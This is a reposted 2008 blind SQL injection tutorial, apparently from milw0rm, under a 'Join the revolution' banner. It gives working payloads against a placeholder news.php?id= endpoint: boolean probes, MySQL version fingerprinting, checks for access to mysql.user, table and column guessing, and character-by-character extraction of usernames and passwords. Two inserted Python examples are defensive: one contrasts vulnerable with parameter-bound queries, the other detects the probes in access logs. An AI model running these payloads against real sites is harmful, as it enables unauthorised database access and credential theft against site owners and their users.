################################################################

 Become Anonymous, Join the revolution
 Re-Formatted, Upped by @Ms_Pony (mspony@hush.com)

################################################################
Please note this is not my tut and was written by marezzi and posted on milw0rm in April 08.
It is for those that already understand basic SQL. I have not edited it, only simply
reformatted it a little bit to make it easier to read.
Blind SQL Injection

Blind injection is a little more complicated than classic injection, but it can be done :D
I must mention that there is a very good blind SQL injection tutorial by xprog, so it's not bad
to read it :D

Let's start with the advanced stuff.
I will be using our example:
###################################################################
http://www.site.com/news.php?id=5
###################################################################
When we execute this, we see some page with articles, pictures etc. on it.
Then, when we want to test it for a blind SQL injection attack:
###################################################################
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
###################################################################
and the page loads normally, that's ok.
Now the real test:
###################################################################
http://www.site.com/news.php?id=5 and 1=2 <--- this is false
###################################################################
So if some text, picture or other content is missing from the returned page, then that site is
vulnerable to blind SQL injection.
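The true/false test above works only because the id parameter is pasted straight into the SQL text. As an added example that is not part of marezzi's tutorial, the following Python script builds that vulnerable concatenated query beside a version that whitelists the value and binds it as a parameter, then runs the 1=1 / 1=2 comparison from the text against both. Python's sqlite3 stands in for MySQL (the boolean trick is the same for this probe); the "news" table, its rows and the article titles are constructed assumptions, not the real site's schema.

```python
import re
import sqlite3

# Constructed stand-in for the site's database (assumption: a "news" table with an
# integer id and a title; the real schema is unknown). sqlite3 replaces MySQL here.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(4, "Older article"), (5, "Article five"), (6, "Newer article")])
    return conn

def fetch_unsafe(conn, id_param):
    """Vulnerable pattern: the raw id parameter is concatenated into the SQL text,
    so 'and 1=2' becomes part of the WHERE clause and flips the result."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def fetch_safe(conn, id_param):
    """Hardened pattern: accept only a plain decimal id, then bind it as a parameter.
    Anything else (spaces, operators, keywords) is rejected before any SQL runs."""
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        return None
    row = conn.execute("SELECT title FROM news WHERE id=?", (int(id_param),)).fetchone()
    return row[0] if row else None

def is_boolean_oracle(fetch, conn, good_id="5"):
    """The tutorial's test: does the response differ between an always-true and an
    always-false condition appended to a valid id? True means the endpoint can be
    used as a blind oracle; a hardened endpoint answers both probes the same way."""
    true_probe = fetch(conn, good_id + " and 1=1")
    false_probe = fetch(conn, good_id + " and 1=2")
    return true_probe != false_probe

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", fetch_unsafe), ("bound", fetch_safe)):
        print(f"{name:13s} id=5 -> {fn(db, '5')!r}, oracle: {is_boolean_oracle(fn, db)}")
```

The concatenated version returns the article for "5 and 1=1" and nothing for "5 and 1=2", which is exactly the content difference the tutorial relies on. The bound version returns the same answer (no article) for both probes, so there is no oracle to drive; the integer whitelist is what stops the probe before the database ever sees it, and parameter binding is what keeps the query text fixed even if the check were loosened.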
1) Get the MySQL version

To get the version in a blind attack we use substring, i.e.:
###################################################################
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
###################################################################
This should return TRUE if the MySQL version is 4.
Replace 4 with 5, and if the query returns TRUE then the version is 5, i.e.:
###################################################################
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
###################################################################
2) Test if subselects work

When select doesn't work, we use a subselect, i.e.:
###################################################################
http://www.site.com/news.php?id=5 and (select 1)=1
###################################################################
If the page loads normally, then subselects work.
Then we check whether we have access to mysql.user, i.e.:
###################################################################
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
###################################################################
If the page loads normally, we have access to mysql.user, and later we can pull some
passwords using the load_file() function and OUTFILE.
3) Check table and column names

This is the part where guessing is your best friend :)
i.e.:
###################################################################
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
###################################################################
With limit 0,1 our query returns 1 row of data, because the subselect must return only 1 row;
this is very important.
Then, if the page loads normally without content missing, the table users exists.
If you get FALSE (some article missing), just change the table name until you guess the right
one :)

Let's say we have found that the table name is users; now what we need is the column name.
Same as with the table name, we start guessing. Like I said before, try the common names for
columns, i.e.:
###################################################################
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
###################################################################
If the page loads normally, we know that the column name is password (if we get FALSE, then try
common names or just guess).
Here we merge 1 with the column password, then substring returns the first character (,1,1).
4) Pull data from the database

We found the table users and the columns username and password, so we are going to pull
characters from them.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
###################################################################
OK, this pulls the first character from the first user in the table users.
substring here returns the first character, 1 character in length. ascii() converts that 1
character into its ASCII value, and then we compare it using the greater-than symbol (>).
So if the ASCII value of the character is greater than 80, the page loads normally (TRUE).
We keep trying until we get FALSE.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
###################################################################
We get TRUE, keep incrementing.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
###################################################################
TRUE again, higher.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
###################################################################
FALSE!!!
###################################################################
So the first character in username is char(99). Using an ASCII converter we know that
char(99) is the letter 'c'.
###################################################################
Then let's check the second character.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
###################################################################
Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second
character, 1 character in length).
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
###################################################################
TRUE, the page loads normally, higher.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
###################################################################
FALSE, lower number.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
###################################################################
TRUE, higher.
###################################################################
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
###################################################################
FALSE!!!
We know that the second character is char(105) and that is 'i'. We have 'ci' so far,
so keep incrementing until you get to the end (when >0 returns FALSE we know that we have
reached the end).
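Seen from the server side, the character-by-character loop above leaves a distinctive trace in the web access log: one client hammering the same endpoint with query strings carrying `and N=N`, `@@version`, `ascii(substring(` or a subselect, while the response sizes alternate between exactly two values (the "true" page and the "false" page). The following Python script is an added example, not part of the tutorial: it parses constructed Apache-style log lines, tags each request with the probe signatures it matches, and reports per-client bursts. The log lines, the signature names and the burst threshold are my own assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access log (not from any real server). The first two requests
# are ordinary page views; the rest replay the tutorial's probes, URL-encoded as sent.
SAMPLE_LOG = """\
10.0.0.7 - - [18/Apr/2008:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
10.0.0.7 - - [18/Apr/2008:10:00:09 +0000] "GET /news.php?id=6 HTTP/1.1" 200 4870
10.0.0.9 - - [18/Apr/2008:10:01:00 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [18/Apr/2008:10:01:02 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 3310
10.0.0.9 - - [18/Apr/2008:10:01:05 +0000] "GET /news.php?id=5%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
10.0.0.9 - - [18/Apr/2008:10:01:08 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 5120
10.0.0.9 - - [18/Apr/2008:10:01:09 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>99 HTTP/1.1" 200 3310
"""

# Signatures of the probes used in the tutorial (the names are my own labels).
PROBE_PATTERNS = {
    "boolean_tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "version_fingerprint": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "char_extraction": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}

# Common log format: client, ident, user, [timestamp], "METHOD target proto", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+)'
)

def classify_request(target):
    """Decode the query string and return the sorted list of probe signatures it matches."""
    query = unquote_plus(urlsplit(target).query)
    return sorted(name for name, rx in PROBE_PATTERNS.items() if rx.search(query))

def analyze_log(text, burst_threshold=3):
    """Group flagged requests by client. A client is marked 'suspected' once it has sent
    burst_threshold or more probe requests; the set of response sizes is kept because a
    working blind oracle produces exactly two sizes (the 'true' page and the 'false' page)."""
    clients = defaultdict(lambda: {"probes": 0, "tags": set(), "response_sizes": set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than abort on one bad entry
        tags = classify_request(m["target"])
        if not tags:
            continue
        entry = clients[m["ip"]]
        entry["probes"] += 1
        entry["tags"].update(tags)
        entry["response_sizes"].add(int(m["bytes"]))
    return {
        ip: {
            "probes": e["probes"],
            "tags": sorted(e["tags"]),
            "response_sizes": sorted(e["response_sizes"]),
            "suspected": e["probes"] >= burst_threshold,
        }
        for ip, e in clients.items()
    }

if __name__ == "__main__":
    for ip, report in analyze_log(SAMPLE_LOG).items():
        print(ip, report)
```

On the constructed log the ordinary client 10.0.0.7 never appears in the report, while 10.0.0.9 is flagged with five probes spanning all four signatures and exactly two response sizes. The signatures only catch the plain forms shown in the tutorial; the per-client burst and the two-size response pattern are the more robust signal, and the fix remains the one in the earlier example, not the log filter.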
There are some tools for blind SQL injection; I think sqlmap is the best, but I'm doing
everything manually, because that makes you a better SQL injector :D
Hope you learned something from this paper.
Have FUN! (:
To be continued and updated...
marezzi@gmail.com
[18 April 2008]
# milw0rm.com [2008-05-22]